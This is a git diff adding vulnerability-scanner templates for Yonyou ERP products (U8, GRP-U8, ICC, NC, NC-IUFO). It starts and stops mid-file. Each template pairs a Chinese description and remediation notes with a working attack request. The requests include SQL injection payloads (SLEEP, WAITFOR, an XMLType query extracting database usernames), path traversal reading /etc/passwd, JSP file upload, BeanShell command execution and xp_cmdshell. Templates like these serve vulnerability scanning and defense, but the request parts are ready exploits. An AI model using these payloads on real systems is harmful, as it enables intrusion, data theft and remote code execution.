4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/Server/CmxMailSet.php' + method: POST + body: sendmail=test' AND (SELECT * FROM (SELECT(SLEEP(5)))MDqI) AND 'geIm'='geIm&username=test + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_2.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_2.yaml" new file mode 100755 index 000000000..a6b3846ff --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/wooyun-2015-156891_2.yaml" @@ -0,0 +1,41 @@ +id: wooyun-2015-156891_2 +info: + name: 用友u8 CmxPagedQuery.php参数ViewAppFld存在sql注入 + author: + - 折跃 + description: |- + 用友U8 CmxPagedQuery.php SQL注入漏洞 + 用友U8是一套全面集成了财务、生产制造及供应链的成熟应用,延伸客户管理至客户关系管理(CRM),并对于零售、分销领域实现了全面整合的企业级解决方案。 + + 用友U8存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/Server/CmxPagedQuery.php?pgid=AppList' + method: POST + body: ViewAppFld=1) AND (SELECT * FROM (SELECT(SLEEP(5)))Tzqe) AND (6547=6547&ViewAppValue=2 + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/yonyou_U8-upload-FileUpload.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/yonyou_U8-upload-FileUpload.yaml" new file mode 100755 index 000000000..956722330 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ERP-U8/yonyou_U8-upload-FileUpload.yaml" @@ -0,0 +1,52 @@ +id: yonyou_U8-upload-FileUpload +info: + name: 用友U8 FileUpload 任意文件上传漏洞 + author: + - 折跃 + description: |- + 用友U8 FileUpload 任意文件上传漏洞 + 用友U8是一套全面集成了财务、生产制造及供应链的成熟应用,延伸客户管理至客户关系管理(CRM),并对于零售、分销领域实现了全面整合的企业级解决方案。 + + 用友U8存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,verify) + raw: + - | + POST /servlet/FileUpload?fileName={{varName}}.jsp&actionID=update HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryttI4BZKhDL2Vl8rL + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.8 + Cookie: JSESSIONID=3D2A49AAB839B03E25A57806A2AB773C + + <% out.println("{{verify}}");%> + - | + GET /R9iPortal/upload/{{varName}}.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213GRP-U8R10/wooyun-2010-0108912.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213GRP-U8R10/wooyun-2010-0108912.yaml" new file mode 100755 index 000000000..e9359b878 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213GRP-U8R10/wooyun-2010-0108912.yaml" @@ -0,0 +1,47 @@ +id: wooyun-2010-0108912 +info: + name: 用友 GRP-u8 四处sql注入打包 + author: + - 折跃 + description: |- + 用友GRP-U8多处SQL注入漏洞 + 用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 + + 用友GRP-U8存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200 + - (duration_2 - duration_1) >=5 + path: + - '{{BaseURL}}/{{tmpPath}}' + - '{{BaseURL}}/{{tmpPath}}%27;WAITFOR%20DELAY%20%270:0:5%27--' + attack: batteringram + method: GET + payloads: + tmpPath: + - IMLoginServlet?pwd=1&uid=1 + - persionTreeServlet?bmdm=1 + - R9iPortal/cm/cm_info_list.jsp?itype_id=3 + - R9iPortal/cm/cm_notice_content.jsp?info_id=4 + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ICC/wooyun-2010-057130.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ICC/wooyun-2010-057130.yaml" new file mode 100755 index 000000000..ffaad6495 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ICC/wooyun-2010-057130.yaml" @@ -0,0 +1,33 @@ +id: wooyun-2010-057130 +info: + name: 用友icc客服系统路径泄露 + author: + - 折跃 + description: |- + 用友ICC 系统路径泄露 + 用友ICC是用友软件推出的企业级互联网呼叫中心及其应用解决方案,ICC即“Internet Call Center”,互联网呼叫中心的简称。 + + 用友ICC存在系统路径泄露。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、屏蔽报错信息输出 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - regex('#32;(/|/)([^<]+)(\d+)(.*)
',body) + path: + - '{{BaseURL}}/birt/document?__document=1' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213ICC/yonyou_ICC-download-getfile.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213ICC/yonyou_ICC-download-getfile.yaml" new file mode 100755 index 000000000..b8edaba18 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213ICC/yonyou_ICC-download-getfile.yaml" @@ -0,0 +1,37 @@ +id: yonyou_ICC-download-getfile +info: + name: 用友ICC getfile 任意文件下载漏洞 + author: + - 折跃 + description: |- + 用友ICC 任意文件下载漏洞 + 用友ICC是用友软件推出的企业级互联网呼叫中心及其应用解决方案,ICC即“Internet Call Center”,互联网呼叫中心的简称。 + + 用友ICC存在任意文件下载漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - regex('root:.*:0:0:',body) + path: + - '{{BaseURL}}/web/common/getfile.jsp?p=..\..\..\..\etc\passwd' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC-IUFO/yonyou_NC_IUFO-sqli-publishinfodetail.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC-IUFO/yonyou_NC_IUFO-sqli-publishinfodetail.yaml" new file mode 100755 index 000000000..5c5ead755 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC-IUFO/yonyou_NC_IUFO-sqli-publishinfodetail.yaml" @@ -0,0 +1,39 @@ +id: yonyou_NC_IUFO-sqli-publishinfodetail +info: + name: 用友NC-IUFO publishinfodetail.jsp SQL注入漏洞 + author: + - 折跃 + description: |+ + 用友NC-IUFO publishinfodetail.jsp SQL注入漏洞 + 用友NC-IUFO(集团报表产品)为集团企业用户提供全面的报表解决方案,并致力于帮助集团企业进行各种报表的集中管理。它主要支持各类业务报表的输出、合并报表编制、分部报告编制以及报表的权限与流程管理。 + + 用友NC-IUFO存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'SYSTEM') + path: + - '{{BaseURL}}/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X%27%20AND%209561%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28104%29%7C%7CCHR%28114%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28USERNAME%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20USERNAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS%20ORDER%20BY%201%20ASC%29%20WHERE%20LIMIT%3D34%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28117%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28105%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20scanf' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/CNVD-2021-30167.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/CNVD-2021-30167.yaml" new file mode 100755 index 000000000..9a954716c --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/CNVD-2021-30167.yaml" @@ -0,0 +1,48 @@ +id: CNVD-2021-30167 +info: + name: UFIDA NC BeanShell Remote Code Execution + author: + - l0ne1y + description: |- + 用友NC bsh.servlet.BshServlet 远程命令执行漏洞 + 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口(BeanShell可以直接执行java代码,适用于测试java代码的接口)直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。 + reference: + - https://mp.weixin.qq.com/s/fvqc1i_g14aeqnztu0zn8a + - https://www.cnvd.org.cn/webinfo/show/6491 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + 补丁地址: [http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19](http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19) + + #### 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行exec类似命令执行功能的函数前,校验参数内容。 +requests: +- matchers: + - type: regex + condition: or + regex: + - uid= + - Windows IP + - type: word + words: + - BeanShell Test Servlet + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("id"); + - | + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("ipconfig"); diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/Yonyou-GRP_U8-SqliToRce.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/Yonyou-GRP_U8-SqliToRce.yaml" new file mode 100755 index 000000000..b8942bc1d --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/Yonyou-GRP_U8-SqliToRce.yaml" @@ -0,0 +1,30 @@ +id: Yonyou-GRP_U8-SqliToRce +info: + name: 用友GRP-U8SQL注入&远程代码执行漏洞 + author: + - l0ne1y + description: |- + 用友GRP-U8SQL注入&远程代码执行漏洞 + 用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + words: + - '{{randomValue}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/Proxy' + method: POST + body: cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell "set/A {{randomValue}}" +variables: + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Arbitrary-FileUpload.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Arbitrary-FileUpload.yaml" new file mode 100755 index 000000000..b1e77d635 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Arbitrary-FileUpload.yaml" @@ -0,0 +1,42 @@ +id: YonyouNc-Arbitrary-FileUpload +info: + name: 用友NC任意文件上传漏洞 + author: + - l0ne1y + description: |- + 用友NC任意文件上传漏洞 + 用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/servlet/FileReceiveServlet' + method: POST + body: '{{random3}}{{fileName}}{{random4}}<%out.print({{randomValue}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>' + headers: + Content-Type: multipart/form-data; +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '{{randomValue}}' + matchers-condition: and + path: + - '{{BaseURL}}/{{fileName}}.jsp' + method: GET + headers: + Content-Type: application/x-www-form-urlencoded +variables: + fileName: '{{rand_base(5, "qwertyuiopasdfghjkl")}}' + random3: "¬í\0\x05sr\0\x11java.util.HashMap\x05\aÚÁÃ\x16`Ñ\x03\0\x02F\0\nloadFactorI\0\tthresholdxp?@\0\0\0\0\0\fw\b\0\0\0\x10\0\0\0\x02t\0\tFILE_NAMEt\0\t" + random4: ".jspt\0\x10TARGET_FILE_PATHt\0\x10./webapps/nc_webx" + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Directory-Traversal.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Directory-Traversal.yaml" new file mode 100755 index 000000000..05a24daab --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouNc-Directory-Traversal.yaml" @@ -0,0 +1,35 @@ +id: YonyouNc-Directory-Traversal +info: + name: 用友NC目录遍历漏洞 + author: + - l0ne1y + description: |- + 用友ERP-NC 目录遍历漏洞 + 用友ERP-NC 存在目录遍历漏洞,目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁. + + #### 临时修复方案: + 1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。 + 2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。 + 3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。 + 4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - NCInvokerServlet + - type: word + part: header + words: + - application/xml + matchers-condition: and + path: + - '{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml' + method: GET diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouU8-OA-Sqli.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouU8-OA-Sqli.yaml" new file mode 100755 index 000000000..3bc940752 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/YonyouU8-OA-Sqli.yaml" @@ -0,0 +1,26 @@ +id: YonyouU8-OA-Sqli +info: + name: Yonyou U8 OA Sqli + author: + - l0ne1y + description: |- + 用友U8-OA存在SQL注入漏洞 + 用友U8-OA存在SQL注入漏洞,SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 +requests: +- matchers: + - type: word + part: body + words: + - '{{md5("{{randstr}}")}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))' + method: GET diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2010-0112834.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2010-0112834.yaml" new file mode 100755 index 000000000..36556e4c4 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2010-0112834.yaml" @@ -0,0 +1,39 @@ +id: wooyun-2010-0112834 +info: + name: 用友NC PortalSESInitToolService 数据库信息泄露漏洞 + author: + - 折跃 + description: |- + 用友NC PortalSESInitToolService 数据库信息泄露漏洞 + 用友NC是一款大型erp企业管理系统与电子商务平台。 + + 用友NC存在数据库信息泄露漏洞,攻击者可通过此漏洞获取数据库配置信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'getDataSourceConfigResponse') + path: + - '{{BaseURL}}/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService' + - '{{BaseURL}}/uapws/service/nc.itf.ses.inittool.SESInitToolService' + method: POST + body: | + + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2014-060988.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2014-060988.yaml" new file mode 100755 index 000000000..f1cdb5ab9 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/wooyun-2014-060988.yaml" @@ -0,0 +1,46 @@ +id: wooyun-2014-060988 +info: + name: 用友NC com.ufida ActionServlet SQL注入漏洞 + author: + - 折跃 + description: |- + 用友NC com.ufida ActionServlet SQL注入漏洞 + 用友NC是一款大型erp企业管理系统与电子商务平台。 + + 用友NC存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - len(regex('&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'qvbpq1qppjq') + path: + - '{{BaseURL}}/epp/html/nodes/upload/SupdocDo.jsp?areaname=areaname=1%27%20AND%202538=%28SELECT%20UPPER%28XMLType%28CHR%2860%29||CHR%2858%29||CHR%28113%29||CHR%28118%29||CHR%2898%29||CHR%28112%29||CHR%28113%29||%28SELECT%20%28CASE%20WHEN%20%282538=2538%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29||CHR%28113%29||CHR%28112%29||CHR%28112%29||CHR%28106%29||CHR%28113%29||CHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27iLAM%27=%27iLAM&supdocname=1&pk_singleplan=1' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-info-ActionServlet.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-info-ActionServlet.yaml" new file mode 100755 index 000000000..96ece7b7a --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-info-ActionServlet.yaml" @@ -0,0 +1,37 @@ +id: yonyou_NC-info-ActionServlet +info: + name: 用友NC com.ufida ActionServlet 用户信息泄露漏洞 + author: + - 折跃 + description: |- + 用友NC com.ufida ActionServlet 用户信息泄露漏洞 + 用友NC是一款大型erp企业管理系统与电子商务平台。 + + 用友NC存在用户信息泄露漏洞。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'iufo/web/images/usericon.gif') + - contains(body,'/iufo/web/images/tree/tree_plus.gif') + path: + - 